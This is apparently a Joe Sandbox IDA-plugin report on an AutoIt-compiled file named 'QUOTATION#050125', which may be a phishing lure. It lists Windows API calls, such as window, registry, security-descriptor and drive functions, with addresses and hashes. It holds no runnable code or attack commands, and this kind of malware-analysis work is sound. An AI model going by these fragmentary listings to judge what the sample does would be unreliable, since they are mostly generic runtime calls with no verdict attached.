• API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
• String ID:
• API String ID: 4124339563-0
APIs
• DestroyWindow.USER32(?,?), ref: 000D8E14
• SendMessageW.USER32(?,00001308,?,00000000), ref: 00116AC5
• ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00116AFE
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00116F43
  • Part of subcall function 000D8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000D8BE8,?,00000000,?,?,?,?,000D8BBA,00000000,?), ref: 000D8FC5
• SendMessageW.USER32(?,00001053), ref: 00116F7F
• SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00116F96
• ImageList_Destroy.COMCTL32(00000000,?), ref: 00116FAC
• ImageList_Destroy.COMCTL32(00000000,?), ref: 00116FB7
Similarity
• API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
• String ID: 0
• API String ID: 2760611726-4108050209
APIs
• DestroyWindow.USER32(00000000), ref: 0014273E
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0014286A
• SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 001428A9
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 001428B9
• CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00142900
• GetClientRect.USER32(00000000,?), ref: 0014290C
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00142955
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00142964
• GetStockObject.GDI32(00000011), ref: 00142974
• SelectObject.GDI32(00000000,00000000), ref: 00142978
• GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00142988
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00142991
• DeleteDC.GDI32(00000000), ref: 0014299A
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 001429C6
• SendMessageW.USER32(00000030,00000000,00000001), ref: 001429DD
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00142A1D
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00142A31
• SendMessageW.USER32(00000404,00000001,00000000), ref: 00142A42
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00142A77
• GetStockObject.GDI32(00000011), ref: 00142A82
• SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00142A8D
• ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00142A97
Similarity
• API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
• String ID: AutoIt v3$DISPLAY$msctls_progress32$static
• API String ID: 2910397461-517079104
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00134AED
• GetDriveTypeW.KERNEL32(?,0015CB68,?,\\.\,0015CC08), ref: 00134BCA
• SetErrorMode.KERNEL32(00000000,0015CB68,?,\\.\,0015CC08), ref: 00134D36
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
• API String ID: 2907320926-4222207086
APIs
• GetSysColor.USER32(00000012), ref: 00157421
• SetTextColor.GDI32(?,?), ref: 00157425
• GetSysColorBrush.USER32(0000000F), ref: 0015743B
• GetSysColor.USER32(0000000F), ref: 00157446
• CreateSolidBrush.GDI32(?), ref: 0015744B
• GetSysColor.USER32(00000011), ref: 00157463
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 00157471
• SelectObject.GDI32(?,00000000), ref: 00157482
• SetBkColor.GDI32(?,00000000), ref: 0015748B
• SelectObject.GDI32(?,?), ref: 00157498
• InflateRect.USER32(?,000000FF,000000FF), ref: 001574B7
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001574CE
• GetWindowLongW.USER32(00000000,000000F0), ref: 001574DB
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0015752A
• GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00157554
• InflateRect.USER32(?,000000FD,000000FD), ref: 00157572
• DrawFocusRect.USER32(?,?), ref: 0015757D
• GetSysColor.USER32(00000011), ref: 0015758E
• SetTextColor.GDI32(?,00000000), ref: 00157596
• DrawTextW.USER32(?,001570F5,000000FF,?,00000000), ref: 001575A8
• SelectObject.GDI32(?,?), ref: 001575BF
• DeleteObject.GDI32(?), ref: 001575CA
• SelectObject.GDI32(?,?), ref: 001575D0
• DeleteObject.GDI32(?), ref: 001575D5
• SetTextColor.GDI32(?,?), ref: 001575DB
• SetBkColor.GDI32(?,?), ref: 001575E5
Similarity
• API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
• API String ID: 1996641542-0
APIs
• GetCursorPos.USER32(?), ref: 00151128
• GetDesktopWindow.USER32 ref: 0015113D
• GetWindowRect.USER32(00000000), ref: 00151144
• GetWindowLongW.USER32(?,000000F0), ref: 00151199
• DestroyWindow.USER32(?), ref: 001511B9
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 001511ED
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0015120B
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0015121D
• SendMessageW.USER32(00000000,00000421,?,?), ref: 00151232
• SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00151245
• IsWindowVisible.USER32(00000000), ref: 001512A1
• SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 001512BC
• SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 001512D0
• GetWindowRect.USER32(00000000,?), ref: 001512E8
• MonitorFromPoint.USER32(?,?,00000002), ref: 0015130E
• GetMonitorInfoW.USER32(00000000,?), ref: 00151328
• CopyRect.USER32(?,?), ref: 0015133F
• SendMessageW.USER32(00000000,00000412,00000000), ref: 001513AA
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
                                                                                      APIs
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000D8968
                                                                                      • GetSystemMetrics.USER32(00000007), ref: 000D8970
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000D899B
                                                                                      • GetSystemMetrics.USER32(00000008), ref: 000D89A3
                                                                                      • GetSystemMetrics.USER32(00000004), ref: 000D89C8
                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000D89E5
                                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 000D89F5
                                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 000D8A28
                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 000D8A3C
                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 000D8A5A
                                                                                      • GetStockObject.GDI32(00000011), ref: 000D8A76
                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 000D8A81
                                                                                        • Part of subcall function 000D912D: GetCursorPos.USER32(?), ref: 000D9141
                                                                                        • Part of subcall function 000D912D: ScreenToClient.USER32(00000000,?), ref: 000D915E
                                                                                        • Part of subcall function 000D912D: GetAsyncKeyState.USER32(00000001), ref: 000D9183
                                                                                        • Part of subcall function 000D912D: GetAsyncKeyState.USER32(00000002), ref: 000D919D
                                                                                      • SetTimer.USER32(00000000,00000000,00000028,000D90FC), ref: 000D8AA8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                      • String ID: AutoIt v3 GUI
                                                                                      • API String ID: 1458621304-248962490
                                                                                      • Opcode ID: 1f78814a1e22475077a8b61667a4015b93e3a52c6824e92c2c763fb39e0d9543
                                                                                      • Instruction ID: 645244f3f7e8e79d5ac68d25678058ebd5b2a51b972d79b111b419c0005ef56b
                                                                                      • Opcode Fuzzy Hash: 1f78814a1e22475077a8b61667a4015b93e3a52c6824e92c2c763fb39e0d9543
                                                                                      • Instruction Fuzzy Hash: C2B16F75A0030AEFDB14DFA8CC55BEE7BB5FB48315F10412AFA15AB290DB70A981CB51
                                                                                      APIs
                                                                                        • Part of subcall function 001210F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00121114
                                                                                        • Part of subcall function 001210F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00120B9B,?,?,?), ref: 00121120
                                                                                        • Part of subcall function 001210F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00120B9B,?,?,?), ref: 0012112F
                                                                                        • Part of subcall function 001210F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00120B9B,?,?,?), ref: 00121136
                                                                                        • Part of subcall function 001210F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0012114D
                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00120DF5
                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00120E29
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00120E40
                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00120E7A
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00120E96
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00120EAD
                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00120EB5
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00120EBC
                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00120EDD
                                                                                      • CopySid.ADVAPI32(00000000), ref: 00120EE4
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00120F13
                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00120F35
                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00120F47
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00120F6E
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00120F75
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00120F7E
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00120F85
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00120F8E
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00120F95
                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00120FA1
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00120FA8
                                                                                        • Part of subcall function 00121193: GetProcessHeap.KERNEL32(00000008,00120BB1,?,00000000,?,00120BB1,?), ref: 001211A1
                                                                                        • Part of subcall function 00121193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00120BB1,?), ref: 001211A8
                                                                                        • Part of subcall function 00121193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00120BB1,?), ref: 001211B7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                      • String ID:
                                                                                      • API String ID: 4175595110-0
                                                                                      • Opcode ID: da880f43b62944f5c6a9a5d1690f618fa77749f5845f190df08a65cf3efe32e0
                                                                                      • Instruction ID: 19652e365b2a03c1d3318dc9a9e76091de2655cdd5446f682e5a368ccdf26ebf
                                                                                      • Opcode Fuzzy Hash: da880f43b62944f5c6a9a5d1690f618fa77749f5845f190df08a65cf3efe32e0
                                                                                      • Instruction Fuzzy Hash: E3717D7290031AEFDF219FA4ED44BAEBBB8FF08311F044215F919A6192D7319955CBA0
                                                                                      APIs
                                                                                      • CharUpperBuffW.USER32(?,?), ref: 001502E5
                                                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 001504C5
                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00150504
                                                                                        • Part of subcall function 0012223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00122258
                                                                                        • Part of subcall function 0012223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0012228A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$BuffCharUpper
                                                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                      • API String ID: 3391685005-719923060
                                                                                      • Opcode ID: 11069395ebc1aece81e77cef09fc22b7205090495de6bd0c3d63fc2980fc9a66
                                                                                      • Instruction ID: 86faf56df8482f9db5729510d1396a03423cff82021908b26d9a4039e94887e0
                                                                                      • Opcode Fuzzy Hash: 11069395ebc1aece81e77cef09fc22b7205090495de6bd0c3d63fc2980fc9a66
                                                                                      • Instruction Fuzzy Hash: 60E19C31208301CFC715EF64C55196EB3E6BF98315B54496DF8A6AB3A2DB30EE49CB81
                                                                                      APIs
                                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 0013FE27
                                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 0013FE32
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0013FE3D
                                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 0013FE48
                                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 0013FE53
                                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 0013FE5E
                                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 0013FE69
                                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 0013FE74
                                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 0013FE7F
                                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 0013FE8A
                                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 0013FE95
                                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 0013FEA0
                                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 0013FEAB
                                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 0013FEB6
                                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 0013FEC1
                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 0013FECC
                                                                                      • GetCursorInfo.USER32(?), ref: 0013FEDC
                                                                                      • GetLastError.KERNEL32 ref: 0013FF1E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                                                      • String ID:
                                                                                      • API String ID: 3215588206-0
                                                                                      • Opcode ID: 46e601b02e6e887497568bcdaf9b34c5cc6ee5fdec8574cf1ce6d2717dc663ba
                                                                                      • Instruction ID: 8227b8106438cdfcf4e1ad1017a549735355ed5643a1fb5fb64055f5f4fa9014
                                                                                      • Opcode Fuzzy Hash: 46e601b02e6e887497568bcdaf9b34c5cc6ee5fdec8574cf1ce6d2717dc663ba
                                                                                      • Instruction Fuzzy Hash: 5D4124B1D04319AADB109FBA8C89C5EBFE8FF04754B50452AE51DEB281DB78D901CF91
                                                                                      APIs
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0014C4BD
                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0015CC08,00000000,?,00000000,?,?), ref: 0014C544
                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0014C5A4
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0014C6B2
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0014C7C1
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0014C84D
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0014C881
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0014C88E
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0014C960
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value$Close$ConnectCreateRegistry
                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                      • API String ID: 492116352-966354055
                                                                                      • Opcode ID: eb2345ec7cae7fc0ec9b810f5e689887c5f753fdb7f9ce7c2182d8ae652db9e7
                                                                                      • Instruction ID: e6687634511ce4ecaddcc61b7109a915ac0af0a325da96162150e83c2df140d9
                                                                                      • Opcode Fuzzy Hash: eb2345ec7cae7fc0ec9b810f5e689887c5f753fdb7f9ce7c2182d8ae652db9e7
                                                                                      • Instruction Fuzzy Hash: C91224356046019FD754DF14C891F6EB7E5EF88724F15889CF88A9B2A2DB31ED41CB81
                                                                                      APIs
                                                                                      • LoadIconW.USER32(00000063), ref: 00125A2E
                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00125A40
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00125A57
                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00125A6C
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00125A72
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00125A82
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00125A88
                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00125AA9
                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00125AC3
                                                                                      • GetWindowRect.USER32(?,?), ref: 00125ACC
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00125B6F
                                                                                      • GetDesktopWindow.USER32 ref: 00125B75
                                                                                      • GetWindowRect.USER32(00000000), ref: 00125B7C
                                                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00125BD3
                                                                                      • GetClientRect.USER32(?,?), ref: 00125BE0
                                                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 00125C05
                                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00125C2F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                      • String ID:
                                                                                      • API String ID: 3869813825-0
                                                                                      • Opcode ID: 4dc8b35a2e6ac1b94ede25e18b5fe45451c9df37b958aa25a92dd932edd23ae1
                                                                                      • Instruction ID: 01ead19fd84c7799bd9ebce1306edf65559687e8f77d4d2c062cf4c5e9ef6f6e
                                                                                      • Opcode Fuzzy Hash: 4dc8b35a2e6ac1b94ede25e18b5fe45451c9df37b958aa25a92dd932edd23ae1
                                                                                      • Instruction Fuzzy Hash: 9771AD31900B19EFDB20DFA8DE85AAEBBF6FF48705F104518E182A76A0D770E950CB50
APIs
• InitializeCriticalSectionAndSpinCount.KERNEL32(0019070C,00000FA0,FC2683AB,?,?,?,?,001023B3,000000FF), ref: 000E011C
• GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,001023B3,000000FF), ref: 000E0127
• GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,001023B3,000000FF), ref: 000E0138
• GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 000E014E
• GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 000E015C
• GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 000E016A
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,001023B3,000000FF), ref: 000E01B5
• DeleteCriticalSection.KERNEL32(0019070C,00000007,?,?,?,?,001023B3,000000FF), ref: 000E01E1
• CloseHandle.KERNEL32(00000000,?,?,?,?,001023B3,000000FF), ref: 000E01F1
Strings
• InitializeConditionVariable, xrefs: 000E0148
• api-ms-win-core-synch-l1-2-0.dll, xrefs: 000E0122
• SleepConditionVariableCS, xrefs: 000E0154
• WakeAllConditionVariable, xrefs: 000E0162
• kernel32.dll, xrefs: 000E0133
Similarity
• API ID: AddressHandleProc$CriticalModuleSection$CloseCountCreateDeleteEventInitializeSpin
• String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
• API String ID: 3758863719-1714406822
• Opcode ID: f75c6747a1d5477d959fbbc5b9e454169709e04513f61f6b7b9500ab30da4114
• Instruction ID: ae98bc068795bdd99604f93bc2228aa0ed782a001039197caf8178309d094ad6
• Opcode Fuzzy Hash: f75c6747a1d5477d959fbbc5b9e454169709e04513f61f6b7b9500ab30da4114
• Instruction Fuzzy Hash: 1C21DE31645741EFEB515FF5AC49B6A37F8EB08B62F000129FC41EA691DBB49C80CAD0
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,0015CC08), ref: 001440BB
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 001440CD
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0015CC08), ref: 001440F2
• FreeLibrary.KERNEL32(00000000,?,0015CC08), ref: 0014413E
• StringFromGUID2.OLE32(?,?,00000028,?,0015CC08), ref: 001441A8
• SysFreeString.OLEAUT32(00000009), ref: 00144262
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 001442C8
• SysFreeString.OLEAUT32(?), ref: 001442F2
Strings
Similarity
• API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
• String ID: GetModuleHandleExW$kernel32.dll
• API String ID: 354098117-199464113
• Opcode ID: a7ce5a45a06a3a801a3a4a005256586d1d59e5b252913a52ce681c337ac7ca90
• Instruction ID: 3c3b514c0ff2d360c41ce67fa40362df074de20b6a22c852abe0133463f44bc5
• Opcode Fuzzy Hash: a7ce5a45a06a3a801a3a4a005256586d1d59e5b252913a52ce681c337ac7ca90
• Instruction Fuzzy Hash: 97122775A00219EFDB14CF94C884EAEBBB5BF45314F258098F905AB261D731ED86CBA0
APIs
• CharUpperBuffW.USER32(?,?), ref: 001509C6
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00150A54
  • Part of subcall function 00122BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00122BFA
Strings
Similarity
• API ID: MessageSend$BuffCharUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 3391685005-4258414348
• Opcode ID: 5e236de13a9fbe29b267ef29b4924a6c1be32c606facdddcd387c580c903e7bf
• Instruction ID: 2408238242c4c18d087d56b1da5a220560f726e0fbc177d3ac40108de0f904c8
• Opcode Fuzzy Hash: 5e236de13a9fbe29b267ef29b4924a6c1be32c606facdddcd387c580c903e7bf
• Instruction Fuzzy Hash: F7E1DF35208301CFC715DFA4C49096EB7E1BF98314B15895CF8AAAB3A2D730EE49CB81
APIs
• GetMenuItemCount.USER32(00191990), ref: 00102F8D
• GetMenuItemCount.USER32(00191990), ref: 0010303D
• GetCursorPos.USER32(?), ref: 00103081
• SetForegroundWindow.USER32(00000000), ref: 0010308A
• TrackPopupMenuEx.USER32(00191990,00000000,?,00000000,00000000,00000000), ref: 0010309D
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 001030A9
Strings
Similarity
• API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
• String ID: 0
• API String ID: 36266755-4108050209
• Opcode ID: 9889443a608f560bdcc809eb3ef91425c2a7764c931ca62b85d1fdd47d21ce77
• Instruction ID: 3a08711eb1169e27aa523df3b0738d10d8216f2ce975fdcf56c8612a88a28428
• Opcode Fuzzy Hash: 9889443a608f560bdcc809eb3ef91425c2a7764c931ca62b85d1fdd47d21ce77
• Instruction Fuzzy Hash: 2371F370644216BFEB259F64DC89FAEBF68FF05364F208216F5256A1E0C7B1A950CB90
APIs
• CharLowerBuffW.USER32(?,?), ref: 00133EF8
• GetDriveTypeW.KERNEL32(?), ref: 00133FD6
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0013401E
